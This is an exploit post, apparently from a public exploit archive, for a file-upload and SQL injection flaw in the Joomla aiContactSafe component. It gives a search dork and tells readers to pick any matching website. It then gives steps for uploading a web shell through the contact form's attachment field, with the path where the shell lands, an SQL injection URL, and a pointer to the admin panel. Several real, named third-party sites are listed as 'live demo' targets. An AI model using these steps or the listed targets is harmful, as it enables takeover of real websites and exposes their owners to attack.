###################### # Exploit Title : Joomla com_aicontactsafe Arbitrary File Upload / SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_aicontactsafe # Software link : http://www.algisinfo.com/en/download/category/1-free-extensions.html # Vendor Homepage : http://www.algisinfo.com/ # version : 2.0.20 # Tested on: [ Windows] # skype:xbadgirl21 # Date: 2016/07/18 # video Proof : https://youtu.be/PdDmThHGVz8 ###################### # [+] FILE UPLOAD : ###################### ###################### # [+] DESCRIPTION : ###################### # [+] aiContactSafe is An AJAX driven component to place a contact form anywhere on your web page # [+] with any number of custom fields of different types, including attachments. # [+] and an Shell Upload and SQLi has been Detected in this component ###################### # [+] PoC : ###################### # 1.- SELECT A WEBSITE FROM THE DORK ABOVE # 2.- http://localhost/site/index.php?option=com_aicontactsafe # 3.- check this Directory if you have Access to it : media/aicontactsafe/attachments # 4.- Just Upload your Shell or Txt or Image to Upload Field # 5.- Shell Directory : media/aicontactsafe/attachments/[RANDOME_NUM]Evi!l.php or the extension uploaded # Ex : http://malmoskyttegille.se/media/aicontactsafe/attachments/x_415.txt ###################### # [+] Live Demo: ###################### # http://malmoskyttegille.se/index.php?option=com_aicontactsafe ###################### # [+] SQL injection: ###################### # PoC : # http://www.site.com/index.php?option=com_aicontactsafe&field=1 # AdminPanel : # http://www.site.com/administrator ###################### # [+] Live Demo: ###################### # http://www.esbrasil.net/portal/index.php?option=com_aicontactsafe&field=1 # http://www.rustyspic-a-part.com/index.php?option=com_aicontactsafe&field=1 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################